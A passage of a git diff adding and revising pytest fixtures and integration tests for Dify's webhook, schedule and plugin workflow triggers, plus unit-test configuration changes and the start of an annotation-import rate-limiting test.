""" + Provide a mock celery group for testing task dispatch. + + Returns: + MockCeleryGroup: Mock group that collects dispatched tasks + """ + return MockCeleryGroup() + + +@pytest.fixture +def mock_celery_signature() -> MockCelerySignature: + """ + Provide a mock celery signature for testing task dispatch. + + Returns: + MockCelerySignature: Mock signature generator + """ + return MockCelerySignature() + + +class MockPluginSubscription: + """Mock plugin subscription for testing plugin triggers.""" + + def __init__( + self, + subscription_id: str = "sub-1", + tenant_id: str = "tenant-1", + provider_id: str = "provider-1", + ) -> None: + self.id = subscription_id + self.tenant_id = tenant_id + self.provider_id = provider_id + self.credentials: dict[str, str] = {"token": "secret"} + self.credential_type = "api-key" + + def to_entity(self) -> MockPluginSubscription: + return self + + +@pytest.fixture +def mock_plugin_subscription() -> MockPluginSubscription: + """ + Provide a mock plugin subscription for testing. + + Returns: + MockPluginSubscription: Mock subscription instance + """ + return MockPluginSubscription() diff --git a/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py b/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py new file mode 100644 index 0000000000..604d68f257 --- /dev/null +++ b/api/tests/test_containers_integration_tests/trigger/test_trigger_e2e.py @@ -0,0 +1,911 @@ +from __future__ import annotations + +import importlib +import json +import time +from datetime import timedelta +from types import SimpleNamespace +from typing import Any + +import pytest +from flask import Flask, Response +from flask.testing import FlaskClient +from sqlalchemy.orm import Session + +from configs import dify_config +from core.plugin.entities.request import TriggerInvokeEventResponse +from core.trigger.debug import event_selectors +from core.trigger.debug.event_bus import TriggerDebugEventBus +from core.trigger.debug.event_selectors import PluginTriggerDebugEventPoller, WebhookTriggerDebugEventPoller +from core.trigger.debug.events import PluginTriggerDebugEvent, build_plugin_pool_key +from core.workflow.enums import NodeType +from libs.datetime_utils import naive_utc_now +from models.account import Account, Tenant +from models.enums import AppTriggerStatus, AppTriggerType, CreatorUserRole, WorkflowTriggerStatus +from models.model import App +from models.trigger import ( + AppTrigger, + TriggerSubscription, + WorkflowPluginTrigger, + WorkflowSchedulePlan, + WorkflowTriggerLog, + WorkflowWebhookTrigger, +) +from models.workflow import Workflow +from schedule import workflow_schedule_task +from schedule.workflow_schedule_task import poll_workflow_schedules +from services import feature_service as feature_service_module +from services.trigger import webhook_service +from services.trigger.schedule_service import ScheduleService +from services.workflow_service import WorkflowService +from tasks import trigger_processing_tasks + +from .conftest import MockCeleryGroup, MockCelerySignature, MockPluginSubscription + +# Test constants +WEBHOOK_ID_PRODUCTION = "wh1234567890123456789012" +WEBHOOK_ID_DEBUG = "whdebug1234567890123456" +TEST_TRIGGER_URL = "https://trigger.example.com/base" + + +def _build_workflow_graph(root_node_id: str, trigger_type: NodeType) -> str: + """Build a minimal workflow graph JSON for testing.""" + node_data: dict[str, Any] = {"type": trigger_type.value, "title": "trigger"} + if trigger_type == NodeType.TRIGGER_WEBHOOK: + node_data.update( + { + "method": "POST", + "content_type": "application/json", + "headers": [], + "params": [], + "body": [], + } + ) + graph = { + "nodes": [ + {"id": root_node_id, "data": node_data}, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": root_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + return json.dumps(graph) + + +def test_publish_blocks_start_and_trigger_coexistence( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Publishing should fail when both start and trigger nodes coexist.""" + tenant, account = tenant_and_account + + graph = { + "nodes": [ + {"id": "start", "data": {"type": NodeType.START.value}}, + {"id": "trig", "data": {"type": NodeType.TRIGGER_WEBHOOK.value}}, + ], + "edges": [], + } + draft_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.VERSION_DRAFT, + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(draft_workflow) + db_session_with_containers.commit() + + workflow_service = WorkflowService() + + monkeypatch.setattr( + feature_service_module.FeatureService, + "get_system_features", + classmethod(lambda _cls: SimpleNamespace(plugin_manager=SimpleNamespace(enabled=False))), + ) + monkeypatch.setattr("services.workflow_service.dify_config", SimpleNamespace(BILLING_ENABLED=False)) + + with pytest.raises(ValueError, match="Start node and trigger nodes cannot coexist"): + workflow_service.publish_workflow(session=db_session_with_containers, app_model=app_model, account=account) + + +def test_trigger_url_uses_config_base(monkeypatch: pytest.MonkeyPatch) -> None: + """TRIGGER_URL config should be reflected in generated webhook and plugin endpoints.""" + original_url = getattr(dify_config, "TRIGGER_URL", None) + + try: + monkeypatch.setattr(dify_config, "TRIGGER_URL", TEST_TRIGGER_URL) + endpoint_module = importlib.reload(importlib.import_module("core.trigger.utils.endpoint")) + + assert ( + endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION) + == f"{TEST_TRIGGER_URL}/triggers/webhook/{WEBHOOK_ID_PRODUCTION}" + ) + assert ( + endpoint_module.generate_webhook_trigger_endpoint(WEBHOOK_ID_PRODUCTION, True) + == f"{TEST_TRIGGER_URL}/triggers/webhook-debug/{WEBHOOK_ID_PRODUCTION}" + ) + assert ( + endpoint_module.generate_plugin_trigger_endpoint_url("end-1") == f"{TEST_TRIGGER_URL}/triggers/plugin/end-1" + ) + finally: + # Restore original config and reload module + if original_url is not None: + monkeypatch.setattr(dify_config, "TRIGGER_URL", original_url) + importlib.reload(importlib.import_module("core.trigger.utils.endpoint")) + + +def test_webhook_trigger_creates_trigger_log( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Production webhook trigger should create a trigger log in the database.""" + tenant, account = tenant_and_account + + webhook_node_id = "webhook-node" + graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK) + published_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=graph_json, + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + webhook_trigger = WorkflowWebhookTrigger( + app_id=app_model.id, + node_id=webhook_node_id, + tenant_id=tenant.id, + webhook_id=WEBHOOK_ID_PRODUCTION, + created_by=account.id, + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=webhook_node_id, + trigger_type=AppTriggerType.TRIGGER_WEBHOOK, + status=AppTriggerStatus.ENABLED, + title="webhook", + ) + + db_session_with_containers.add_all([webhook_trigger, app_trigger]) + db_session_with_containers.commit() + + def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace: + log = WorkflowTriggerLog( + tenant_id=trigger_data.tenant_id, + app_id=trigger_data.app_id, + workflow_id=trigger_data.workflow_id, + root_node_id=trigger_data.root_node_id, + trigger_metadata=trigger_data.trigger_metadata.model_dump_json() if trigger_data.trigger_metadata else "{}", + trigger_type=trigger_data.trigger_type, + workflow_run_id=None, + outputs=None, + trigger_data=trigger_data.model_dump_json(), + inputs=json.dumps(dict(trigger_data.inputs)), + status=WorkflowTriggerStatus.SUCCEEDED, + error="", + queue_name="triggered_workflow_dispatcher", + celery_task_id="celery-test", + created_by_role=CreatorUserRole.ACCOUNT, + created_by=account.id, + ) + session.add(log) + session.commit() + return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test") + + monkeypatch.setattr( + webhook_service.AsyncWorkflowService, + "trigger_workflow_async", + _fake_trigger_workflow_async, + ) + + response = test_client_with_containers.post(f"/triggers/webhook/{webhook_trigger.webhook_id}", json={"foo": "bar"}) + + assert response.status_code == 200 + + db_session_with_containers.expire_all() + logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all() + assert logs, "Webhook trigger should create trigger log" + + +@pytest.mark.parametrize("schedule_type", ["visual", "cron"]) +def test_schedule_poll_dispatches_due_plan( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + mock_celery_group: MockCeleryGroup, + mock_celery_signature: MockCelerySignature, + monkeypatch: pytest.MonkeyPatch, + schedule_type: str, +) -> None: + """Schedule plans (both visual and cron) should be polled and dispatched when due.""" + tenant, _ = tenant_and_account + + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=f"schedule-{schedule_type}", + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + status=AppTriggerStatus.ENABLED, + title=f"schedule-{schedule_type}", + ) + plan = WorkflowSchedulePlan( + app_id=app_model.id, + node_id=f"schedule-{schedule_type}", + tenant_id=tenant.id, + cron_expression="* * * * *", + timezone="UTC", + next_run_at=naive_utc_now() - timedelta(minutes=1), + ) + db_session_with_containers.add_all([app_trigger, plan]) + db_session_with_containers.commit() + + next_time = naive_utc_now() + timedelta(hours=1) + monkeypatch.setattr(workflow_schedule_task, "calculate_next_run_at", lambda *_args, **_kwargs: next_time) + monkeypatch.setattr(workflow_schedule_task, "group", mock_celery_group) + monkeypatch.setattr(workflow_schedule_task, "run_schedule_trigger", mock_celery_signature) + + poll_workflow_schedules() + + assert mock_celery_group.collected, f"Should dispatch signatures for due {schedule_type} schedules" + scheduled_ids = {sig["schedule_id"] for sig in mock_celery_group.collected} + assert plan.id in scheduled_ids + + +def test_schedule_visual_debug_poll_generates_event(monkeypatch: pytest.MonkeyPatch) -> None: + """Visual mode schedule node should generate event in single-step debug.""" + base_now = naive_utc_now() + monkeypatch.setattr(event_selectors, "naive_utc_now", lambda: base_now) + monkeypatch.setattr( + event_selectors, + "calculate_next_run_at", + lambda *_args, **_kwargs: base_now - timedelta(minutes=1), + ) + node_config = { + "id": "schedule-visual", + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "mode": "visual", + "frequency": "daily", + "visual_config": {"time": "3:00 PM"}, + "timezone": "UTC", + }, + } + poller = event_selectors.ScheduleTriggerDebugEventPoller( + tenant_id="tenant", + user_id="user", + app_id="app", + node_config=node_config, + node_id="schedule-visual", + ) + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"] == {} + + +def test_plugin_trigger_dispatches_and_debug_events( + test_client_with_containers: FlaskClient, + mock_plugin_subscription: MockPluginSubscription, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin trigger endpoint should dispatch events and generate debug events.""" + endpoint_id = "1cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + + debug_events: list[dict[str, Any]] = [] + dispatched_payloads: list[dict[str, Any]] = [] + + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + dispatch_data = { + "user_id": "end-user", + "tenant_id": mock_plugin_subscription.tenant_id, + "endpoint_id": _endpoint_id, + "provider_id": mock_plugin_subscription.provider_id, + "subscription_id": mock_plugin_subscription.id, + "timestamp": int(time.time()), + "events": ["created", "updated"], + "request_id": f"req-{_endpoint_id}", + } + trigger_processing_tasks.dispatch_triggered_workflows_async.delay(dispatch_data) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + ) + + monkeypatch.setattr( + trigger_processing_tasks.TriggerDebugEventBus, + "dispatch", + staticmethod(lambda **kwargs: debug_events.append(kwargs) or 1), + ) + + def _fake_delay(dispatch_data: dict[str, Any]) -> None: + dispatched_payloads.append(dispatch_data) + trigger_processing_tasks.dispatch_trigger_debug_event( + events=dispatch_data["events"], + user_id=dispatch_data["user_id"], + timestamp=dispatch_data["timestamp"], + request_id=dispatch_data["request_id"], + subscription=mock_plugin_subscription, + ) + + monkeypatch.setattr( + trigger_processing_tasks.dispatch_triggered_workflows_async, + "delay", + staticmethod(_fake_delay), + ) + + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"hello": "world"}) + + assert response.status_code == 202 + assert dispatched_payloads, "Plugin trigger should enqueue workflow dispatch payload" + assert debug_events, "Plugin trigger should dispatch debug events" + dispatched_event_names = {event["event"].name for event in debug_events} + assert dispatched_event_names == {"created", "updated"} + + +def test_webhook_debug_dispatches_event( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Webhook single-step debug should dispatch debug event and be pollable.""" + tenant, account = tenant_and_account + webhook_node_id = "webhook-debug-node" + graph_json = _build_workflow_graph(webhook_node_id, NodeType.TRIGGER_WEBHOOK) + draft_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.VERSION_DRAFT, + graph=graph_json, + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(draft_workflow) + db_session_with_containers.commit() + + webhook_trigger = WorkflowWebhookTrigger( + app_id=app_model.id, + node_id=webhook_node_id, + tenant_id=tenant.id, + webhook_id=WEBHOOK_ID_DEBUG, + created_by=account.id, + ) + db_session_with_containers.add(webhook_trigger) + db_session_with_containers.commit() + + debug_events: list[dict[str, Any]] = [] + original_dispatch = TriggerDebugEventBus.dispatch + monkeypatch.setattr( + "controllers.trigger.webhook.TriggerDebugEventBus.dispatch", + lambda **kwargs: (debug_events.append(kwargs), original_dispatch(**kwargs))[1], + ) + + # Listener polls first to enter waiting pool + poller = WebhookTriggerDebugEventPoller( + tenant_id=tenant.id, + user_id=account.id, + app_id=app_model.id, + node_config=draft_workflow.get_node_config_by_id(webhook_node_id), + node_id=webhook_node_id, + ) + assert poller.poll() is None + + response = test_client_with_containers.post( + f"/triggers/webhook-debug/{webhook_trigger.webhook_id}", + json={"foo": "bar"}, + headers={"Content-Type": "application/json"}, + ) + + assert response.status_code == 200 + assert debug_events, "Debug event should be sent to event bus" + # Second poll should get the event + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"]["webhook_body"]["foo"] == "bar" + assert debug_events[0]["pool_key"].endswith(f":{app_model.id}:{webhook_node_id}") + + +def test_plugin_single_step_debug_flow( + flask_app_with_containers: Flask, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin single-step debug: listen -> dispatch event -> poller receives and returns variables.""" + tenant_id = "tenant-1" + app_id = "app-1" + user_id = "user-1" + node_id = "plugin-node" + provider_id = "langgenius/provider-1/provider-1" + node_config = { + "id": node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin", + "plugin_id": "plugin-1", + "plugin_unique_identifier": "plugin-1", + "provider_id": provider_id, + "event_name": "created", + "subscription_id": "sub-1", + "parameters": {}, + }, + } + # Start listening + poller = PluginTriggerDebugEventPoller( + tenant_id=tenant_id, + user_id=user_id, + app_id=app_id, + node_config=node_config, + node_id=node_id, + ) + assert poller.poll() is None + + from core.trigger.debug.events import build_plugin_pool_key + + pool_key = build_plugin_pool_key( + tenant_id=tenant_id, + provider_id=provider_id, + subscription_id="sub-1", + name="created", + ) + TriggerDebugEventBus.dispatch( + tenant_id=tenant_id, + event=PluginTriggerDebugEvent( + timestamp=int(time.time()), + user_id=user_id, + name="created", + request_id="req-1", + subscription_id="sub-1", + provider_id="provider-1", + ), + pool_key=pool_key, + ) + + from core.plugin.entities.request import TriggerInvokeEventResponse + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.invoke_trigger_event", + staticmethod( + lambda **_kwargs: TriggerInvokeEventResponse( + variables={"echo": "pong"}, + cancelled=False, + ) + ), + ) + + event = poller.poll() + assert event is not None + assert event.workflow_args["inputs"]["echo"] == "pong" + + +def test_schedule_trigger_creates_trigger_log( + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Schedule trigger execution should create WorkflowTriggerLog in database.""" + from tasks import workflow_schedule_tasks + + tenant, account = tenant_and_account + + # Create published workflow with schedule trigger node + schedule_node_id = "schedule-node" + graph = { + "nodes": [ + { + "id": schedule_node_id, + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "title": "schedule", + "mode": "cron", + "cron_expression": "0 9 * * *", + "timezone": "UTC", + }, + }, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": schedule_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + published_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + # Create schedule plan + plan = WorkflowSchedulePlan( + app_id=app_model.id, + node_id=schedule_node_id, + tenant_id=tenant.id, + cron_expression="0 9 * * *", + timezone="UTC", + next_run_at=naive_utc_now() - timedelta(minutes=1), + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=schedule_node_id, + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + status=AppTriggerStatus.ENABLED, + title="schedule", + ) + db_session_with_containers.add_all([plan, app_trigger]) + db_session_with_containers.commit() + + # Mock AsyncWorkflowService to create WorkflowTriggerLog + def _fake_trigger_workflow_async(session: Session, user: Any, trigger_data: Any) -> SimpleNamespace: + log = WorkflowTriggerLog( + tenant_id=trigger_data.tenant_id, + app_id=trigger_data.app_id, + workflow_id=published_workflow.id, + root_node_id=trigger_data.root_node_id, + trigger_metadata="{}", + trigger_type=AppTriggerType.TRIGGER_SCHEDULE, + workflow_run_id=None, + outputs=None, + trigger_data=trigger_data.model_dump_json(), + inputs=json.dumps(dict(trigger_data.inputs)), + status=WorkflowTriggerStatus.SUCCEEDED, + error="", + queue_name="schedule_executor", + celery_task_id="celery-schedule-test", + created_by_role=CreatorUserRole.ACCOUNT, + created_by=account.id, + ) + session.add(log) + session.commit() + return SimpleNamespace(workflow_trigger_log_id=log.id, task_id=None, status="queued", queue="test") + + monkeypatch.setattr( + workflow_schedule_tasks.AsyncWorkflowService, + "trigger_workflow_async", + _fake_trigger_workflow_async, + ) + + # Mock quota to avoid rate limiting + from enums import quota_type + + monkeypatch.setattr(quota_type.QuotaType.TRIGGER, "consume", lambda _tenant_id: quota_type.unlimited()) + + # Execute schedule trigger + workflow_schedule_tasks.run_schedule_trigger(plan.id) + + # Verify WorkflowTriggerLog was created + db_session_with_containers.expire_all() + logs = db_session_with_containers.query(WorkflowTriggerLog).filter_by(app_id=app_model.id).all() + assert logs, "Schedule trigger should create WorkflowTriggerLog" + assert logs[0].trigger_type == AppTriggerType.TRIGGER_SCHEDULE + assert logs[0].root_node_id == schedule_node_id + + +@pytest.mark.parametrize( + ("mode", "frequency", "visual_config", "cron_expression", "expected_cron"), + [ + # Visual mode: hourly + ("visual", "hourly", {"on_minute": 30}, None, "30 * * * *"), + # Visual mode: daily + ("visual", "daily", {"time": "3:00 PM"}, None, "0 15 * * *"), + # Visual mode: weekly + ("visual", "weekly", {"time": "9:00 AM", "weekdays": ["mon", "wed", "fri"]}, None, "0 9 * * 1,3,5"), + # Visual mode: monthly + ("visual", "monthly", {"time": "10:30 AM", "monthly_days": [1, 15]}, None, "30 10 1,15 * *"), + # Cron mode: direct expression + ("cron", None, None, "*/5 * * * *", "*/5 * * * *"), + ], +) +def test_schedule_visual_cron_conversion( + mode: str, + frequency: str | None, + visual_config: dict[str, Any] | None, + cron_expression: str | None, + expected_cron: str, +) -> None: + """Schedule visual config should correctly convert to cron expression.""" + + node_config: dict[str, Any] = { + "id": "schedule-node", + "data": { + "type": NodeType.TRIGGER_SCHEDULE.value, + "mode": mode, + "timezone": "UTC", + }, + } + + if mode == "visual": + node_config["data"]["frequency"] = frequency + node_config["data"]["visual_config"] = visual_config + else: + node_config["data"]["cron_expression"] = cron_expression + + config = ScheduleService.to_schedule_config(node_config) + + assert config.cron_expression == expected_cron, f"Expected {expected_cron}, got {config.cron_expression}" + assert config.timezone == "UTC" + assert config.node_id == "schedule-node" + + +def test_plugin_trigger_full_chain_with_db_verification( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin trigger should create WorkflowTriggerLog and WorkflowPluginTrigger records.""" + + tenant, account = tenant_and_account + + # Create published workflow with plugin trigger node + plugin_node_id = "plugin-trigger-node" + provider_id = "langgenius/test-provider/test-provider" + subscription_id = "sub-plugin-test" + endpoint_id = "2cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + + graph = { + "nodes": [ + { + "id": plugin_node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin", + "plugin_id": "test-plugin", + "plugin_unique_identifier": "test-plugin", + "provider_id": provider_id, + "event_name": "test_event", + "subscription_id": subscription_id, + "parameters": {}, + }, + }, + {"id": "answer-1", "data": {"type": NodeType.ANSWER.value, "title": "answer"}}, + ], + "edges": [{"source": plugin_node_id, "target": "answer-1", "sourceHandle": "success"}], + } + published_workflow = Workflow.new( + tenant_id=tenant.id, + app_id=app_model.id, + type="workflow", + version=Workflow.version_from_datetime(naive_utc_now()), + graph=json.dumps(graph), + features=json.dumps({}), + created_by=account.id, + environment_variables=[], + conversation_variables=[], + rag_pipeline_variables=[], + ) + db_session_with_containers.add(published_workflow) + app_model.workflow_id = published_workflow.id + db_session_with_containers.commit() + + # Create trigger subscription + subscription = TriggerSubscription( + name="test-subscription", + tenant_id=tenant.id, + user_id=account.id, + provider_id=provider_id, + endpoint_id=endpoint_id, + parameters={}, + properties={}, + credentials={"token": "test-secret"}, + credential_type="api-key", + ) + db_session_with_containers.add(subscription) + db_session_with_containers.commit() + + # Update subscription_id to match the created subscription + graph["nodes"][0]["data"]["subscription_id"] = subscription.id + published_workflow.graph = json.dumps(graph) + db_session_with_containers.commit() + + # Create WorkflowPluginTrigger + plugin_trigger = WorkflowPluginTrigger( + app_id=app_model.id, + tenant_id=tenant.id, + node_id=plugin_node_id, + provider_id=provider_id, + event_name="test_event", + subscription_id=subscription.id, + ) + app_trigger = AppTrigger( + tenant_id=tenant.id, + app_id=app_model.id, + node_id=plugin_node_id, + trigger_type=AppTriggerType.TRIGGER_PLUGIN, + status=AppTriggerStatus.ENABLED, + title="plugin", + ) + db_session_with_containers.add_all([plugin_trigger, app_trigger]) + db_session_with_containers.commit() + + # Track dispatched data + dispatched_data: list[dict[str, Any]] = [] + + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + dispatch_data = { + "user_id": "end-user", + "tenant_id": tenant.id, + "endpoint_id": _endpoint_id, + "provider_id": provider_id, + "subscription_id": subscription.id, + "timestamp": int(time.time()), + "events": ["test_event"], + "request_id": f"req-{_endpoint_id}", + } + dispatched_data.append(dispatch_data) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + ) + + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"test": "data"}) + + assert response.status_code == 202 + assert dispatched_data, "Plugin trigger should dispatch event data" + assert dispatched_data[0]["subscription_id"] == subscription.id + assert dispatched_data[0]["events"] == ["test_event"] + + # Verify database records exist + db_session_with_containers.expire_all() + plugin_triggers = ( + db_session_with_containers.query(WorkflowPluginTrigger) + .filter_by(app_id=app_model.id, node_id=plugin_node_id) + .all() + ) + assert plugin_triggers, "WorkflowPluginTrigger record should exist" + assert plugin_triggers[0].provider_id == provider_id + assert plugin_triggers[0].event_name == "test_event" + + +def test_plugin_debug_via_http_endpoint( + test_client_with_containers: FlaskClient, + db_session_with_containers: Session, + tenant_and_account: tuple[Tenant, Account], + app_model: App, + monkeypatch: pytest.MonkeyPatch, +) -> None: + """Plugin single-step debug via HTTP endpoint should dispatch debug event and be pollable.""" + + tenant, account = tenant_and_account + + provider_id = "langgenius/debug-provider/debug-provider" + endpoint_id = "3cc7fa12-3f7b-4f6a-9c8d-1234567890ab" + event_name = "debug_event" + + # Create subscription + subscription = TriggerSubscription( + name="debug-subscription", + tenant_id=tenant.id, + user_id=account.id, + provider_id=provider_id, + endpoint_id=endpoint_id, + parameters={}, + properties={}, + credentials={"token": "debug-secret"}, + credential_type="api-key", + ) + db_session_with_containers.add(subscription) + db_session_with_containers.commit() + + # Create plugin trigger node config + node_id = "plugin-debug-node" + node_config = { + "id": node_id, + "data": { + "type": NodeType.TRIGGER_PLUGIN.value, + "title": "plugin-debug", + "plugin_id": "debug-plugin", + "plugin_unique_identifier": "debug-plugin", + "provider_id": provider_id, + "event_name": event_name, + "subscription_id": subscription.id, + "parameters": {}, + }, + } + + # Start listening with poller + + poller = PluginTriggerDebugEventPoller( + tenant_id=tenant.id, + user_id=account.id, + app_id=app_model.id, + node_config=node_config, + node_id=node_id, + ) + assert poller.poll() is None, "First poll should return None (waiting)" + + # Track debug events dispatched + debug_events: list[dict[str, Any]] = [] + original_dispatch = TriggerDebugEventBus.dispatch + + def _tracking_dispatch(**kwargs: Any) -> int: + debug_events.append(kwargs) + return original_dispatch(**kwargs) + + monkeypatch.setattr(TriggerDebugEventBus, "dispatch", staticmethod(_tracking_dispatch)) + + # Mock process_endpoint to trigger debug event dispatch + def _fake_process_endpoint(_endpoint_id: str, _request: Any) -> Response: + # Simulate what happens inside process_endpoint + dispatch_triggered_workflows_async + pool_key = build_plugin_pool_key( + tenant_id=tenant.id, + provider_id=provider_id, + subscription_id=subscription.id, + name=event_name, + ) + TriggerDebugEventBus.dispatch( + tenant_id=tenant.id, + event=PluginTriggerDebugEvent( + timestamp=int(time.time()), + user_id="end-user", + name=event_name, + request_id=f"req-{_endpoint_id}", + subscription_id=subscription.id, + provider_id=provider_id, + ), + pool_key=pool_key, + ) + return Response("ok", status=202) + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.process_endpoint", + staticmethod(_fake_process_endpoint), + ) + + # Call HTTP endpoint + response = test_client_with_containers.post(f"/triggers/plugin/{endpoint_id}", json={"debug": "payload"}) + + assert response.status_code == 202 + assert debug_events, "Debug event should be dispatched via HTTP endpoint" + assert debug_events[0]["event"].name == event_name + + # Mock invoke_trigger_event for poller + + monkeypatch.setattr( + "services.trigger.trigger_service.TriggerService.invoke_trigger_event", + staticmethod( + lambda **_kwargs: TriggerInvokeEventResponse( + variables={"http_debug": "success"}, + cancelled=False, + ) + ), + ) + + # Second poll should receive the event + event = poller.poll() + assert event is not None, "Poller should receive debug event after HTTP trigger" + assert event.workflow_args["inputs"]["http_debug"] == "success" diff --git a/api/tests/unit_tests/conftest.py b/api/tests/unit_tests/conftest.py index f484fb22d3..c5e1576186 100644 --- a/api/tests/unit_tests/conftest.py +++ b/api/tests/unit_tests/conftest.py @@ -26,16 +26,29 @@ redis_mock.hgetall = MagicMock(return_value={}) redis_mock.hdel = MagicMock() redis_mock.incr = MagicMock(return_value=1) +# Ensure OpenDAL fs writes to tmp to avoid polluting workspace +os.environ.setdefault("OPENDAL_SCHEME", "fs") +os.environ.setdefault("OPENDAL_FS_ROOT", "/tmp/dify-storage") +os.environ.setdefault("STORAGE_TYPE", "opendal") + # Add the API directory to Python path to ensure proper imports import sys sys.path.insert(0, PROJECT_DIR) -# apply the mock to the Redis client in the Flask app from extensions import ext_redis -redis_patcher = patch.object(ext_redis, "redis_client", redis_mock) -redis_patcher.start() + +def _patch_redis_clients_on_loaded_modules(): + """Ensure any module-level redis_client references point to the shared redis_mock.""" + + import sys + + for module in list(sys.modules.values()): + if module is None: + continue + if hasattr(module, "redis_client"): + module.redis_client = redis_mock @pytest.fixture @@ -49,6 +62,15 @@ def _provide_app_context(app: Flask): yield +@pytest.fixture(autouse=True) +def _patch_redis_clients(): + """Patch redis_client to MagicMock only for unit test executions.""" + + with patch.object(ext_redis, "redis_client", redis_mock): + _patch_redis_clients_on_loaded_modules() + yield + + @pytest.fixture(autouse=True) def reset_redis_mock(): """reset the Redis mock before each test""" @@ -63,3 +85,20 @@ def reset_redis_mock(): redis_mock.hgetall.return_value = {} redis_mock.hdel.return_value = None redis_mock.incr.return_value = 1 + + # Keep any imported modules pointing at the mock between tests + _patch_redis_clients_on_loaded_modules() + + +@pytest.fixture(autouse=True) +def reset_secret_key(): + """Ensure SECRET_KEY-dependent logic sees an empty config value by default.""" + + from configs import dify_config + + original = dify_config.SECRET_KEY + dify_config.SECRET_KEY = "" + try: + yield + finally: + dify_config.SECRET_KEY = original diff --git a/api/tests/unit_tests/controllers/console/app/test_annotation_security.py b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py new file mode 100644 index 0000000000..06a7b98baf --- /dev/null +++ b/api/tests/unit_tests/controllers/console/app/test_annotation_security.py @@ -0,0 +1,347 @@ +""" +Unit tests for annotation import security features. + +Tests rate limiting, concurrency control, file validation, and other +security features added to prevent DoS attacks on the annotation import endpoint. +""" + +import io +from unittest.mock import MagicMock, patch + +import pytest +from pandas.errors import ParserError +from werkzeug.datastructures import FileStorage + +from configs import dify_config + + +class TestAnnotationImportRateLimiting: + """Test rate limiting for annotation import operations.""" + + @pytest.fixture + def mock_redis(self): + """Mock Redis client for testing.""" + with patch("controllers.console.wraps.redis_client") as mock: + yield mock + + @pytest.fixture + def mock_current_account(self): + """Mock current account with tenant.""" + with patch("controllers.console.wraps.current_account_with_tenant") as mock: + mock.return_value = (MagicMock(id="user_id"), "test_tenant_id") + yield mock + + def test_rate_limit_per_minute_enforced(self, mock_redis, mock_current_account): + """Test that per-minute rate limit is enforced.""" + from controllers.console.wraps import annotation_import_rate_limit + 